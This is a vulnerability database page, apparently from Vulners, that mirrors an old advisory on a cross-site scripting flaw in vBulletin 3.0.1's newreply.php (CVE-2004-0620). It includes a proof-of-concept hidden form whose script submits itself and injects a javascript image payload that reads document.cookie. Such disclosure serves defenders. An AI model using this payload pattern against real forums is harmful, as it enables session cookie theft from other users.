Lucene search
+L

vBulletin 3.0.1 - 'newreply.php?WYSIWYG_HTML' Cross-Site Scripting

🗓️ 24 Jun 2004 00:00:00Reported by Cheng Peng SuType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

vBulletin 3.0.1 vulnerable to HTML injection in newreply.php affecting user security.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2004-0620
30 Jun 200404:00
cve
Cvelist
CVE-2004-0620
30 Jun 200404:00
cvelist
EUVD
EUVD-2004-0619
7 Oct 202500:30
euvd
NVD
CVE-2004-0620
6 Dec 200405:00
nvd
OpenVAS
vBulletin < 3.0.2 XSS Vulnerability
3 Nov 200500:00
openvas
OpenVAS
vBulletin XSS
3 Nov 200500:00
openvas
Tenable Nessus
vBulletin newreply.php WYSIWYG_HTML Parameter XSS
22 Sep 200400:00
nessus
source: https://www.securityfocus.com/bid/10602/info

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

<form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.03617
48